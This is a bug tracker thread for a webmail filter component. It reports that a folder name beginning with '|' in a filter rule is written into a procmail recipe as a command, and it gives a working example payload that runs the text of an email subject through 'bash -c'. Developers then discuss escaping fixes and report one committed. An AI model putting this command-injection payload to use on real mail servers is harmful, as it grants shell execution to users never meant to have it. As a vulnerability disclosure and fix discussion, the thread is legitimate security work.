Fri, 10 Apr 2026 12:41:21 +0000 https://bugs.horde.org/ticket/4513 command execution with procmail It is possible to use a foldername beginning with | as mailbox destination in a filterrule. If the users don't have shell acces to the mailserver this rule could be used to bypass this restriction. EXCAPMLE: The Foldername |formail -rA "X-Loop:hisemailaddres@excample.com" | ( cat - ;myCmd="$MATCH"; echo "Executing: $myCmd" ; bash -c "$myCmd" ) |$SENDMAIL -oi -t would result in a prcmail like the following * ^From:.*hisemailaddres@excample\.com { :0 * ^Subject:.*exec_command\/.*$ |formail -rA "X-Loop:hisemailaddres@excample.com" | ( cat - ; myCmd="$MATCH"; echo "Executing: $myCmd" ; bash -c "$myCmd" ) | $SENDMAIL -oi -t } Wed, 11 Oct 2006 11:34:08 +0000 https://bugs.horde.org/ticket/4513#t24880 A possible way to handle this, from my own procmail knowledge and experiments, would be to escape the folder filenames the following way : - if the first character is ":", "*", "!", "|", "{" or "}" : prepend "./" to the filename - quote the whole filename with 'single quotes' but I wonder if procmail may exist on systems where the folder separator isn't "/"... Fri, 13 Oct 2006 17:37:34 +0000 https://bugs.horde.org/ticket/4513#t24994 escapeshellcmd() should take care of escaping all necessary characters (since that's what it's designed to do). Fixed in HEAD and FRAMEWORK_3. Sat, 14 Oct 2006 07:32:50 +0000 https://bugs.horde.org/ticket/4513#t25014 Careful with that; escapeshellcmd is for an entire command. escapeshellarg is for a single argument and may be more appropriate here (also may not, but you should double-check if you didn't already look at it). Sat, 14 Oct 2006 18:41:17 +0000 https://bugs.horde.org/ticket/4513#t25020 I looked at both, and escapeshellcmd() seems to be more appropriate. Sat, 14 Oct 2006 18:48:53 +0000 https://bugs.horde.org/ticket/4513#t25023 K, just wanted to double check. Sat, 14 Oct 2006 21:56:52 +0000 https://bugs.horde.org/ticket/4513#t25027